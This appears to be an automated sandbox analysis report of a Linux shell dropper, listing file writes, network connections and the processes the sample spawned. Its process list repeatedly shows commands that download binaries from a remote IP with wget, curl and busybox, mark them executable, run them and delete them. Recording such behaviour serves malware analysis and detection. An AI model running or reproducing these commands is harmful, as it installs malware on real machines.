| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
Processes
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
